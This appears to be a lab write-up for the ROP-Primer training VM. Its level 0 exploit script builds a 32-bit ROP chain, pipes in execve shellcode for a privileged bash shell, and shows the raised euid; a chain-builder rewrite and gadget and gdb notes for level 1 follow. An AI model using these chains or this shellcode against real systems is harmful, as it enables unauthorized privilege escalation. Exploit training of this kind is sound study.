ROP-Primer
Level 0
#!/usr/bin/python
import struct

def p(x):
    # pack one 32-bit little-endian word
    return struct.pack('<L', x)

payload = ""
payload += "A" * 44          # padding up to the saved return address
payload += p(0x080523e0)     # mprotect@plt
payload += p(0x08048882)     # pppr: pop; pop; pop; ret (pops the three args)
payload += p(0xbfff5000)     # addr (page-aligned stack address)
payload += p(0x1000)         # page-aligned size
payload += p(0x7)            # PROT_READ|PROT_WRITE|PROT_EXEC
payload += p(0x080517f0)     # read@plt
payload += p(0x08048882)     # pppr
payload += p(0x0)            # fd=STDIN
payload += p(0xbfff5000)     # addr (the page just made executable)
payload += p(0x200)          # length
payload += p(0xbfff5000)     # address of shellcode: pppr returns here after read
print payload
level0@rop:~$ (./gen.py ;python -c 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"'; cat) | ./level0
[+] ROP tutorial level0
[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAĆ ā!
id
uid=1000(level0) gid=1000(level0) euid=1001(level1) groups=1001(level1),1000(level0)
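The script above is the page's own level 0 exploit. What follows is an added example, not code from the page or from the ROP-Primer VM: it rebuilds the same 88 bytes from a generic call-frame builder (function, pop-N-ret gadget, N arguments, repeated), checks the mprotect arguments the chain depends on, and decodes a captured payload back into its 32-bit slots the way an analyst would when reconstructing a chain from a crash dump. The PLT, gadget and stack addresses are copied from the script above; the builder, its pop-N-ret selection and the argument checks are my generalization and are not part of the page.

```python
import struct

PAGE_SIZE = 0x1000

def p32(x):
    """Pack one 32-bit little-endian word (the same as the page's p())."""
    return struct.pack('<L', x)

def check_mprotect_args(addr, length, prot):
    """Reject arguments that mprotect(2) refuses with EINVAL or that would
    not make the target page executable. addr must be page-aligned (the
    kernel rounds length up itself); an unaligned addr fails the whole call
    and the later jump to the shellcode crashes. Returns True on success."""
    if addr % PAGE_SIZE != 0:
        raise ValueError("mprotect addr 0x%x is not page-aligned" % addr)
    if length <= 0:
        raise ValueError("mprotect length must be positive")
    if prot & 0x4 == 0:  # PROT_EXEC
        raise ValueError("prot 0x%x does not include PROT_EXEC" % prot)
    return True

def build_chain(calls, pop_gadgets, final_ret):
    """Lay out a 32-bit ROP chain for a sequence of (func, args) calls.

    Frame per call: func address, pop-N-ret gadget, then the N arguments.
    func returns into the gadget, the gadget pops the N args and returns into
    the next call's func address; after the last call it returns into
    final_ret. pop_gadgets maps N -> address of a pop-N-ret gadget.
    """
    chain = b""
    for func, args in calls:
        n = len(args)
        if n not in pop_gadgets:
            raise ValueError("no pop%dret gadget available" % n)
        chain += p32(func) + p32(pop_gadgets[n])
        chain += b"".join(p32(a) for a in args)
    return chain + p32(final_ret)

def decode_chain(payload, pad):
    """Split a captured payload (after `pad` bytes of filler) into the
    32-bit words the chain is made of."""
    body = payload[pad:]
    if len(body) % 4:
        raise ValueError("chain is not a whole number of 32-bit words")
    return [w for (w,) in struct.iter_unpack('<L', body)]

# Constants taken from the level 0 script on this page.
MPROTECT_PLT = 0x080523e0
READ_PLT     = 0x080517f0
PPPR         = 0x08048882   # pop; pop; pop; ret
SCRATCH      = 0xbfff5000   # page-aligned stack address
PROT_RWX     = 0x7          # PROT_READ | PROT_WRITE | PROT_EXEC
STDIN_FILENO = 0
PADDING      = 44           # bytes up to the saved return address

def build_level0_payload():
    """Reproduce the page's chain: mprotect(SCRATCH, PAGE, RWX), then
    read(0, SCRATCH, 0x200), then return into SCRATCH."""
    check_mprotect_args(SCRATCH, PAGE_SIZE, PROT_RWX)
    calls = [
        (MPROTECT_PLT, [SCRATCH, PAGE_SIZE, PROT_RWX]),
        (READ_PLT,     [STDIN_FILENO, SCRATCH, 0x200]),
    ]
    return b"A" * PADDING + build_chain(calls, {3: PPPR}, final_ret=SCRATCH)

if __name__ == "__main__":
    payload = build_level0_payload()
    for i, word in enumerate(decode_chain(payload, PADDING)):
        print("slot %2d: 0x%08x" % (i, word))
```

Running the block lists the eleven slots in order; the output of build_level0_payload() is byte-for-byte the payload the page's gen.py prints (minus the trailing newline of Python 2's print), which is the check to run before trusting a rewritten chain builder.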
Level 1
Lines 71, 72: filesize < sizeof(filename)

gdb-peda$ ropgadget
ret = 0x804851c
popret = 0x8048e93
pop2ret = 0x8048ef7
pop3ret = 0x8048ef6
pop4ret = 0x8048ef5
leaveret = 0x8048610
addesp_44 = 0x8048ef2

0x8049128 "flag"
0xf7f27620

fd[eax] = open("flag", ?, ?)
read(fd, buf_addr, size)
write(stdout[1], buf_addr, size)

b 0x08048d8c
set 0xbffff6c0=0x22ba
set follow-fork-mode child
b 0x8048a34 (store)
b 0x08048c5b (read)